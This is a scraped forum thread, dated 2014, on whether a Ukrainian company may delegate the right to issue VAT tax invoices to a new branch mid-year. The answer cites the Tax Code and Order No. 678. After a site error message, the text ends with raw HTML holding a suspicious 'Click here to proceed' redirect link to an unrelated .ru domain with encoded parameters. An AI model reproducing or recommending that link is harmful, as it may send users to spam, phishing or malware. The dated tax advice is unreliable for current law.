делегирование права выписывать НН

zoor
делегирование права выписывать НН
в связи с тем что предприятие открывает филиал, можно ли на протяжении года делегировать право выписывать НН филиалу?как правильно выписывать НН и кто отображает их в регистре?
 
10.28.14 4:57
Ответ: TAxer
За нормами ПКУ філії не
За нормами ПКУ філії не можуть отримати статусу платників ПДВ. Адже філії не підпадають під визначення особи з метою розділу V ПКУ, наведене у пп. 14.1.139 ПКУ, бо вони не є юридичними особами. Право виписувати податкові накладні надається виключно платникам ПДВ, яким присвоєно індивідуальний податковий номер платника податку, а таким платником може стати лише юридична особа. Отже, право на нарахування податку та складання податкових накладних відповідно до п. 201.8 ПКУ має тільки головне підприємство. Але якщо філія самостійно здійснює постачання товарів/послуг та проводить розрахунки з контрагентами, то платник податку — головне підприємство може делегувати їй право складання ПН. Для цього головне підприємство за своїм рішенням (на практиці воно засвідчується наказом та/або у положенні про філію) кожній філії присвоює окремий числовий номер, про що письмово повідомляє податкову за місцем реєстрації як платника ПДВ. Форму такого повідомлення (додаток 2) затверджено Порядком №678 (1). На підставі цього повідомлення філії буде делеговано право виписувати ПН та право вести частину Реєстру виданих та отриманих податкових накладних (далі — реєстр). У додатку 2 зазначають відомості про філію: числовий номер філії, код за ЄДРПОУ філії, найменування та податкову адресу філії. Як сказано у п. 13 розділу ІІІ Порядку №678, повідомлення подає головне підприємство разом із декларацією з ПДВ за перший звітний (податковий) період року (у разі наявності у них філій) і надалі разом із декларацією за той звітний період, у якому відбулися зміни у переліку філій. Отже, нормативно-правовими актами не заборонено протягом року головному підприємству прийняти рішення про делегування права виписування ПН філіями. Особливості виписування ПН філією стосуються порядкового номера ПН та деяких обов'язкових реквізитів. Порядковий номер ПН містить лише числові значення (не повинен містити літер чи інших символів), у першій частині (до знаків дробу) проставляється порядковий номер (присвоюється відповідно до її номера в реєстрі), у третій частині (після знаків дробу) — присвоєний числовий номер філії (2).
 
10.28.14 8:57
делегирование права выписывать НН | Оптимизация налогообложения

Ошибка

На сайте произошла непредвиденная ошибка. Пожалуйста, повторите попытку позже.
<body bgcolor="#ffffff" text="#000000"> <a href="http://ikmfyeurnamdjs.ru/rg-erdr.php?_rpo=t nhFexEw&_rdm=WUVQqf3NB1V4=9.N3&p=5f95%7C%40%7C5f95%7C%40%7CWUVQqf3NB1V4%3D9.N3%7C%40%7CfB%7C%40%7C%7C%40%7CZzAZAzFHF%7C%40%7Czbb%7C%40%7C39%7C%40%7C19c4NW4cGtAtAtzEGAATHbGG%7C%40%7Ct+nAGL7EI%7C%40%7CT+7hEEpub&ga=cVs6UihF%2FeuwkgGNATCUPnZ2OX2lf01yGheqh7dgQlXWDJkBNhNOukwAds8Ppcx5JrCNNjC1kszGccaS635Ul%2FUFVSBMQ7ZoN0vbd9ncI5Rvbn0Nl50tXHgRQThJYK%2BKqPqMNwM25mRWhtJtE%2B%2BNYaFUBWwA8GhBwo%2Bn%2B5GFvO0%3D&t=nfrm">Click here to proceed</a>. </body>